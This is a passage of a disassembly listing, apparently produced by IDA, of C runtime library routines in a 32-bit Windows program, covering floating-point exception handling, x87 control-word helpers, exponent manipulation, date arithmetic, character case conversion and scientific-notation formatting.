; ---------------------------------------------------------------------------
loc_430036: ; CODE XREF: sub_42FF67+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_437628
fnstsw ax
sahf
jbe short loc_43004E
fld dbl_4536E0
jmp short loc_430056
; ---------------------------------------------------------------------------
loc_43004E: ; CODE XREF: sub_42FF67+DD�j
; DATA XREF: .text:0043AB74�o
fld dbl_4536D0
fchs
loc_430056: ; CODE XREF: sub_42FF67+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_43005C: ; DATA XREF: .text:off_43BA40�o
; .text:off_43C0B0�o
jmp short loc_43007C
; ---------------------------------------------------------------------------
loc_43005E: ; CODE XREF: sub_42FF67+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_437628
fld dbl_4536D0
fnstsw ax
sahf
ja short loc_430076
fchs
loc_430076: ; CODE XREF: sub_42FF67+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_43007C: ; CODE XREF: sub_42FF67+A5�j
; sub_42FF67+CD�j ...
fstp qword ptr [ecx]
loc_43007E: ; CODE XREF: sub_42FF67+81�j
and edi, 0FFFFFFFEh
jmp loc_43015C
; ---------------------------------------------------------------------------
loc_430086: ; CODE XREF: sub_42FF67+47�j
; sub_42FF67+51�j
test al, 2
jz loc_43015C
test byte ptr [ebp+arg_8], 10h
jz loc_43015C
push esi
xor esi, esi
test al, 10h
jz short loc_4300A1
mov esi, ebx
loc_4300A1: ; CODE XREF: sub_42FF67+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp dbl_437628
fnstsw ax
sahf
jz loc_43014A
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_430315
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_4300EC
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_430140
; ---------------------------------------------------------------------------
loc_4300EC: ; CODE XREF: sub_42FF67+17A�j
fld [ebp+var_C]
fcomp dbl_437628
fnstsw ax
sahf
jnb short loc_4300FE
mov edx, ebx
jmp short loc_430100
; ---------------------------------------------------------------------------
loc_4300FE: ; CODE XREF: sub_42FF67+191�j
xor edx, edx
loc_430100: ; CODE XREF: sub_42FF67+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_430134
sub eax, ecx
loc_430117: ; CODE XREF: sub_42FF67+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_430122
test esi, esi
jnz short loc_430122
mov esi, ebx
loc_430122: ; CODE XREF: sub_42FF67+1B3�j
; sub_42FF67+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_43012E
or byte ptr [ebp+var_C+3], 80h
loc_43012E: ; CODE XREF: sub_42FF67+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_430117
loc_430134: ; CODE XREF: sub_42FF67+1AC�j
test edx, edx
jz short loc_430140
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_430140: ; CODE XREF: sub_42FF67+183�j
; sub_42FF67+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_43014C
; ---------------------------------------------------------------------------
loc_43014A: ; CODE XREF: sub_42FF67+14E�j
mov esi, ebx
loc_43014C: ; CODE XREF: sub_42FF67+1E1�j
test esi, esi
pop esi
jz short loc_430159
push 10h
call sub_430416
pop ecx
loc_430159: ; CODE XREF: sub_42FF67+1E8�j
and edi, 0FFFFFFFDh
loc_43015C: ; CODE XREF: sub_42FF67+26�j
; sub_42FF67+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_430173
test byte ptr [ebp+arg_8], 20h
jz short loc_430173
push 20h
call sub_430416
pop ecx
and edi, 0FFFFFFEFh
loc_430173: ; CODE XREF: sub_42FF67+1F9�j
; sub_42FF67+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_42FF67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_43017E(int, int, int, int, int, int, double, int)
sub_43017E proc near ; CODE XREF: sub_42FBC8+2B�p
; sub_42FC1C+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_43022E
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_4301E9
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_4303F3
lea eax, [ebp+var_20]
push eax
call sub_420D8E
add esp, 0Ch
test eax, eax
jnz short loc_4301E3
push esi
call sub_430206
pop ecx
loc_4301E3: ; CODE XREF: sub_43017E+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4301E9: ; CODE XREF: sub_43017E+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_4303F3
push [ebp+arg_0]
call sub_430206
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_43017E endp
; =============== S U B R O U T I N E =======================================
sub_430206 proc near ; CODE XREF: sub_42FC1C+7D�p
; sub_43017E+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_430222
jle short locret_43022D
cmp eax, 3
jg short locret_43022D
call sub_42F119
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_430222: ; CODE XREF: sub_430206+7�j
call sub_42F119
mov dword ptr [eax], 21h
locret_43022D: ; CODE XREF: sub_430206+9�j
; sub_430206+E�j
retn
sub_430206 endp
; =============== S U B R O U T I N E =======================================
sub_43022E proc near ; CODE XREF: sub_43017E+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_4535F8
loc_430235: ; CODE XREF: sub_43022E+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_43024B
add eax, 8
inc ecx
cmp eax, offset dbl_4536D0
jl short loc_430235
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_43024B: ; CODE XREF: sub_43022E+D�j
mov eax, off_4535FC[ecx*8]
retn
sub_43022E endp
; =============== S U B R O U T I N E =======================================
sub_430253 proc near ; CODE XREF: sub_42FC1C+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_43025F
push 5
jmp short loc_430275
; ---------------------------------------------------------------------------
loc_43025F: ; CODE XREF: sub_430253+6�j
test al, 8
jz short loc_430267
push 1
jmp short loc_430275
; ---------------------------------------------------------------------------
loc_430267: ; CODE XREF: sub_430253+E�j
test al, 4
jz short loc_43026F
push 2
jmp short loc_430275
; ---------------------------------------------------------------------------
loc_43026F: ; CODE XREF: sub_430253+16�j
test al, 1
jz short loc_430277
push 3
loc_430275: ; CODE XREF: sub_430253+A�j
; sub_430253+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_430277: ; CODE XREF: sub_430253+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_430253 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_430280(double)
sub_430280 proc near ; CODE XREF: sub_42A706:loc_42A78C�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_430280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_430292(double, int)
sub_430292 proc near ; CODE XREF: sub_430315+82�p
; sub_430315+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_430292 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4302BB proc near ; CODE XREF: sub_42A706+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_4302D2
cmp [ebp+arg_0], edx
jnz short loc_4302E4
push 1
jmp short loc_43030E
; ---------------------------------------------------------------------------
loc_4302D2: ; CODE XREF: sub_4302BB+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_4302E4
cmp [ebp+arg_0], edx
jnz short loc_4302E4
push 2
jmp short loc_43030E
; ---------------------------------------------------------------------------
loc_4302E4: ; CODE XREF: sub_4302BB+11�j
; sub_4302BB+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_4302F7
push 3
jmp short loc_43030E
; ---------------------------------------------------------------------------
loc_4302F7: ; CODE XREF: sub_4302BB+36�j
cmp cx, 7FF0h
jnz short loc_430311
test [ebp+arg_4], 7FFFFh
jnz short loc_43030C
cmp [ebp+arg_0], edx
jz short loc_430311
loc_43030C: ; CODE XREF: sub_4302BB+4A�j
push 4
loc_43030E: ; CODE XREF: sub_4302BB+15�j
; sub_4302BB+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_430311: ; CODE XREF: sub_4302BB+41�j
; sub_4302BB+4F�j
xor eax, eax
pop ebp
retn
sub_4302BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_430315(double, int)
sub_430315 proc near ; CODE XREF: sub_42FF67+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp dbl_437628
push esi
fnstsw ax
sahf
jnz short loc_430335
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_4303CB
; ---------------------------------------------------------------------------
loc_430335: ; CODE XREF: sub_430315+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_4303A4
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_43034D
cmp dword ptr [ebp+arg_0], ecx
jz short loc_4303A4
loc_43034D: ; CODE XREF: sub_430315+31�j
fld [ebp+arg_0]
fcomp dbl_437628
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_430365
push 1
pop eax
jmp short loc_430367
; ---------------------------------------------------------------------------
loc_430365: ; CODE XREF: sub_430315+49�j
xor eax, eax
loc_430367: ; CODE XREF: sub_430315+4E�j
; sub_430315+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_430380
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_43037A
or dword ptr [ebp+arg_0+4], 1
loc_43037A: ; CODE XREF: sub_430315+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_430367
; ---------------------------------------------------------------------------
loc_430380: ; CODE XREF: sub_430315+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_43038E
or byte ptr [ebp+arg_0+7], 80h
loc_43038E: ; CODE XREF: sub_430315+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_430292
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_4303CB
; ---------------------------------------------------------------------------
loc_4303A4: ; CODE XREF: sub_430315+28�j
; sub_430315+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_430292
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_4303CB: ; CODE XREF: sub_430315+1B�j
; sub_430315+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_430315 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4303D6 proc near ; CODE XREF: sub_42FCB4+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_4303D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4303E4 proc near ; CODE XREF: sub_42FCB4+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_4303E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4303F3 proc near ; CODE XREF: sub_42A706+13�p
; sub_42A706+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_4303F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430416 proc near ; CODE XREF: sub_42FF67+1D�p
; sub_42FF67+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_43042D
fld tbyte_4536F8
fistp [ebp+arg_0]
wait
loc_43042D: ; CODE XREF: sub_430416+B�j
test cl, 8
jz short loc_430442
fstsw ax
fld tbyte_4536F8
fstp [ebp+var_8]
wait
fstsw ax
loc_430442: ; CODE XREF: sub_430416+1A�j
test cl, 10h
jz short loc_430451
fld tbyte_453704
fstp [ebp+var_8]
wait
loc_430451: ; CODE XREF: sub_430416+2F�j
test cl, 4
jz short loc_43045F
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_43045F: ; CODE XREF: sub_430416+3E�j
test cl, 20h
jz short locret_43046A
fldpi
fstp [ebp+var_8]
wait
locret_43046A: ; CODE XREF: sub_430416+4C�j
leave
retn
sub_430416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43046C proc near ; CODE XREF: sub_42A7D5+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_430528
cmp ebx, 8Ah
jg loc_430528
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_453C04[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_4304AB
cmp edi, 2
jle short loc_4304AB
inc esi
loc_4304AB: ; CODE XREF: sub_43046C+37�j
; sub_43046C+3C�j
call sub_433988
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_453B24
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_43051E
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_430524
cmp dword_453B28, 0
jz short loc_430524
lea eax, [ebp+var_24]
push eax
call sub_433C3D
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_430524
loc_43051E: ; CODE XREF: sub_43046C+90�j
add ecx, dword_453B2C
loc_430524: ; CODE XREF: sub_43046C+96�j
; sub_43046C+9F�j ...
mov eax, ecx
jmp short loc_43052B
; ---------------------------------------------------------------------------
loc_430528: ; CODE XREF: sub_43046C+13�j
; sub_43046C+1F�j
or eax, 0FFFFFFFFh
loc_43052B: ; CODE XREF: sub_43046C+BA�j
pop ebx
leave
retn
sub_43046C endp
; =============== S U B R O U T I N E =======================================
sub_43052E proc near ; CODE XREF: sub_4306E1+9�p
arg_0 = dword ptr 4
push ebx
xor ebx, ebx
cmp dword_6769A8, ebx
jnz short loc_43054C
mov eax, [esp+4+arg_0]
cmp eax, 41h
jl short loc_43059B
cmp eax, 5Ah
jg short loc_43059B
add eax, 20h
pop ebx
retn
; ---------------------------------------------------------------------------
loc_43054C: ; CODE XREF: sub_43052E+9�j
push esi
mov esi, offset dword_676EDC
push edi
push esi
call dword_437224 ; InterlockedIncrement
cmp dword_676ED8, ebx
mov edi, dword_437220
jz short loc_430576
push esi
call edi ; dword_437220
push 13h
call sub_42DAEF
pop ecx
push 1
pop ebx
loc_430576: ; CODE XREF: sub_43052E+38�j
push [esp+0Ch+arg_0]
call sub_43059D
test ebx, ebx
pop ecx
mov [esp+0Ch+arg_0], eax
jz short loc_430592
push 13h
call sub_42DB50
pop ecx
jmp short loc_430595
; ---------------------------------------------------------------------------
loc_430592: ; CODE XREF: sub_43052E+58�j
push esi
call edi ; dword_437220
loc_430595: ; CODE XREF: sub_43052E+62�j
mov eax, [esp+0Ch+arg_0]
pop edi
pop esi
loc_43059B: ; CODE XREF: sub_43052E+12�j
; sub_43052E+17�j
pop ebx
retn
sub_43052E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43059D proc near ; CODE XREF: sub_42A8C0+94�p
; sub_42A8C0+9E�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_6769A8, 0
push ebx
push esi
push edi
jnz short loc_4305CA
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_430663
cmp eax, 5Ah
jg loc_430663
add eax, 20h
jmp loc_430663
; ---------------------------------------------------------------------------
loc_4305CA: ; CODE XREF: sub_43059D+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_4305FE
cmp dword_4535C4, esi
jle short loc_4305EC
push esi
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_4305F6
; ---------------------------------------------------------------------------
loc_4305EC: ; CODE XREF: sub_43059D+42�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, esi
loc_4305F6: ; CODE XREF: sub_43059D+4D�j
test eax, eax
jnz short loc_4305FE
loc_4305FA: ; CODE XREF: sub_43059D+AD�j
mov eax, ebx
jmp short loc_430663
; ---------------------------------------------------------------------------
loc_4305FE: ; CODE XREF: sub_43059D+3A�j
; sub_43059D+5B�j
mov edx, off_4533B8
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_430622
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_43062B
; ---------------------------------------------------------------------------
loc_430622: ; CODE XREF: sub_43059D+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_43062B: ; CODE XREF: sub_43059D+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push dword_6769A8
call sub_430D9F
add esp, 20h
test eax, eax
jz short loc_4305FA
cmp eax, esi
jnz short loc_430656
movzx eax, [ebp+var_4]
jmp short loc_430663
; ---------------------------------------------------------------------------
loc_430656: ; CODE XREF: sub_43059D+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_430663: ; CODE XREF: sub_43059D+16�j
; sub_43059D+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43059D endp
; =============== S U B R O U T I N E =======================================
sub_430668 proc near ; CODE XREF: sub_42A990+F�p
push 30000h
push 10000h
call sub_433FFF
pop ecx
pop ecx
retn
sub_430668 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43067A proc near ; CODE XREF: sub_4306B8:loc_4306DC�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_437638
fstp [ebp+var_8]
fld dbl_437630
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_437430
fnstsw ax
sahf
jbe short loc_4306B4
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_4306B4: ; CODE XREF: sub_43067A+33�j
xor eax, eax
leave
retn
sub_43067A endp
; =============== S U B R O U T I N E =======================================
sub_4306B8 proc near ; CODE XREF: sub_42A990+5�p
push offset aKernel32 ; "KERNEL32"
call dword_437070 ; GetModuleHandleA
test eax, eax
jz short loc_4306DC
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword_437030 ; GetProcAddress
test eax, eax
jz short loc_4306DC
push 0
call eax ; sub_42A990
retn
; ---------------------------------------------------------------------------
loc_4306DC: ; CODE XREF: sub_4306B8+D�j
; sub_4306B8+1D�j
jmp sub_43067A
sub_4306B8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4306E1 proc near ; CODE XREF: sub_42DC7D+3CB�p
; DATA XREF: sub_42A9A8+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_43052E
cmp eax, 65h
pop ecx
jz short loc_430721
loc_4306F5: ; CODE XREF: sub_4306E1+3E�j
inc esi
cmp dword_4535C4, 1
jle short loc_43070E
movsx eax, byte ptr [esi]
push 4
push eax
call sub_42F12B
pop ecx
pop ecx
jmp short loc_43071D
; ---------------------------------------------------------------------------
loc_43070E: ; CODE XREF: sub_4306E1+1C�j
movsx eax, byte ptr [esi]
mov ecx, off_4533B8
mov al, [ecx+eax*2]
and eax, 4
loc_43071D: ; CODE XREF: sub_4306E1+2B�j
test eax, eax
jnz short loc_4306F5
loc_430721: ; CODE XREF: sub_4306E1+12�j
mov cl, byte_4535C8
mov al, [esi]
mov [esi], cl
inc esi
loc_43072C: ; CODE XREF: sub_4306E1+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_43072C
pop esi
retn
sub_4306E1 endp
; =============== S U B R O U T I N E =======================================
sub_43073B proc near ; CODE XREF: sub_42DC7D+3E2�p
; DATA XREF: sub_42A9A8+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, byte_4535C8
mov cl, [eax]
test cl, cl
jz short loc_430757
loc_43074B: ; CODE XREF: sub_43073B+1A�j
cmp cl, dl
jz short loc_430757
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_43074B
loc_430757: ; CODE XREF: sub_43073B+E�j
; sub_43073B+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_430788
loc_43075E: ; CODE XREF: sub_43073B+34�j
mov cl, [eax]
test cl, cl
jz short loc_430771
cmp cl, 65h
jz short loc_430771
cmp cl, 45h
jz short loc_430771
inc eax
jmp short loc_43075E
; ---------------------------------------------------------------------------
loc_430771: ; CODE XREF: sub_43073B+27�j
; sub_43073B+2C�j ...
mov ecx, eax
loc_430773: ; CODE XREF: sub_43073B+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_430773
cmp [eax], dl
jnz short loc_43077E
dec eax
loc_43077E: ; CODE XREF: sub_43073B+40�j
; sub_43073B+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_43077E
locret_430788: ; CODE XREF: sub_43073B+21�j
retn
sub_43073B endp
; =============== S U B R O U T I N E =======================================
sub_430789 proc near ; DATA XREF: sub_42A9A8+28�o
; .text:off_45382C�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_437628
fnstsw ax
sahf
jb short loc_43079E
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_43079E: ; CODE XREF: sub_430789+F�j
xor eax, eax
retn
sub_430789 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4307A1 proc near ; CODE XREF: sub_42E5F5+430�p
; DATA XREF: sub_42A9A8+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_4307CA
lea eax, [ebp+var_8]
push eax
call sub_4344C2
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_4307CA: ; CODE XREF: sub_4307A1+C�j
lea eax, [ebp+arg_8]
push eax
call sub_4344EF
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_4307A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4307DF proc near ; CODE XREF: sub_430A91+47�p
var_3C = qword ptr -3Ch
var_28 = byte ptr -28h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
lea eax, [ebp+var_28]
push esi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+3Ch+var_3C]
call sub_434593
mov esi, [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
mov edx, [ebp+arg_4]
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_43451C
lea eax, [ebp+var_10]
push 0
push eax
push [ebp+arg_C]
push esi
push [ebp+arg_4]
call sub_430840
mov eax, [ebp+arg_4]
add esp, 30h
pop esi
leave
retn
sub_4307DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430840 proc near ; CODE XREF: sub_4307DF+53�p
; sub_4309FE+86�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_10], bl
push esi
mov esi, [ebp+arg_C]
push edi
mov edi, [ebp+arg_0]
jz short loc_43086E
xor eax, eax
cmp [ebp+arg_4], ebx
setnle al
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, edi
push eax
call sub_430AE2
pop ecx
pop ecx
loc_43086E: ; CODE XREF: sub_430840+11�j
cmp dword ptr [esi], 2Dh
mov eax, edi
jnz short loc_43087B
mov byte ptr [edi], 2Dh
lea eax, [edi+1]
loc_43087B: ; CODE XREF: sub_430840+33�j
cmp [ebp+arg_4], ebx
jle short loc_430892
mov dl, [eax+1]
lea ecx, [eax+1]
mov [eax], dl
mov eax, ecx
mov cl, byte_4535C8
mov [eax], cl
loc_430892: ; CODE XREF: sub_430840+3E�j
xor ecx, ecx
cmp [ebp+arg_10], bl
push offset aE000 ; "e+000"
setz cl
add ecx, eax
add ecx, [ebp+arg_4]
push ecx
call sub_42A5D0
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
mov ecx, eax
jz short loc_4308B6
mov byte ptr [ecx], 45h
loc_4308B6: ; CODE XREF: sub_430840+71�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_4308FB
mov ebx, [esi+4]
dec ebx
jns short loc_4308CA
neg ebx
mov byte ptr [ecx], 2Dh
loc_4308CA: ; CODE XREF: sub_430840+83�j
inc ecx
cmp ebx, 64h
jl short loc_4308E1
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
